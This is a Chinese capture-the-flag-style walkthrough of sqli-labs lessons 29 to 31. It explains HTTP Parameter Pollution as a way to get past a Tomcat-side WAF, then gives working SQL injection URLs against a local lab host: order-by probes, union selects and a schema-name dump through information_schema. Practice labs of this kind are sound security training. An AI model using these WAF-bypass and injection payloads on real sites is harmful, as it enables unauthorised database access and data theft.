Less29(jspstudy)-Less31

Less-29

需要用到jspstudyphpstudy

 Less29(jspstudy)-Less31_第1张图片

 

 

index.jsp?id=1&id=2请求,服务器配置情况,客户端请求首先过tomcat,tomcat解析第一个参数,接下来tomcat去请求apache(php)服务器,apache解析最后一个参数。那最终返回客户端的应该是id=2的参数。

即jsp/tomcat使用getParameter("id")获取到的是第一个值,php/apache使用$_GET["id"]获取的是第二个值,那么第一个id纯数字,第二个id的值

 

我们往往在tomcat服务器处做数据过滤和处理,功能类似为一个WAF。而正因为解析参数的不同,我们此处可以利用该原理绕过WAF的检测。该用法就是HPP(HTTP Parameter Pollution),http参数污染攻击的一个应用。HPP可对服务器和客户端都能够造成一定的威胁。

 

搭建jspstudy

sqli-labs-master文件夹下面还有tomcat文件,这才是真正的关卡,里面的jspstudy需要搭建环境jspstudy

jspstudy:https://www.xp.cn/download.html

 Less29(jspstudy)-Less31_第2张图片

 

 Less29(jspstudy)-Less31_第3张图片

 

 Less29(jspstudy)-Less31_第4张图片

 

 Less29(jspstudy)-Less31_第5张图片

 

 修改网站端口,网站目录

将第29      url 修改成自己实际情况的

 Less29(jspstudy)-Less31_第6张图片

 

 

成功打开第29

 Less29(jspstudy)-Less31_第7张图片

 

 

 

开始正式进入29关学习 

(看下图)得知‘’包裹  

 Less29(jspstudy)-Less31_第8张图片

 

 

http://192.168.27.156:8080/sqli-labs/Less-29/?id=1' order by 3--+

 Less29(jspstudy)-Less31_第9张图片

 

 

前面已经说了,最后返回的是后面那个参数的值,所以后面那个是id=2’对应的就是数据库的第二个

 Less29(jspstudy)-Less31_第10张图片

 

 

http://192.168.27.156:8080/sqli-labs/Less-29/?id=1&id=3'order by 3 --+ 

说明有三列

 Less29(jspstudy)-Less31_第11张图片

 

 Less29(jspstudy)-Less31_第12张图片

 

 

http://192.168.27.156:8080/sqli-labs/Less-29/?id=1&id=-3' union select 1,2,3--+

得到回显位置

 Less29(jspstudy)-Less31_第13张图片

 

 

http://192.168.27.156:8080/sqli-labs/Less-29/?id=1&id=-3' union select 1,2,group_concat(schema_name) from   information_schema.schemata--+

 Less29(jspstudy)-Less31_第14张图片

 

 

。。

。。。其他跟第一关的一样,请参照第一关

 

Less30:

得知””包裹

 Less29(jspstudy)-Less31_第15张图片

 

 

http://192.168.27.156:8080/sqli-labs/Less-30/?id=1&id=1" order by 3 --+      得知有三列

 Less29(jspstudy)-Less31_第16张图片

 

Less29(jspstudy)-Less31_第17张图片

 

 并且没有报出错误,无法使用报错注入

剩下的与第29关一致

 

 

Less31:

使用”)包裹  其他与第29关一致

 Less29(jspstudy)-Less31_第18张图片

 

 Less29(jspstudy)-Less31_第19张图片

 

你可能感兴趣的:(Less29(jspstudy)-Less31)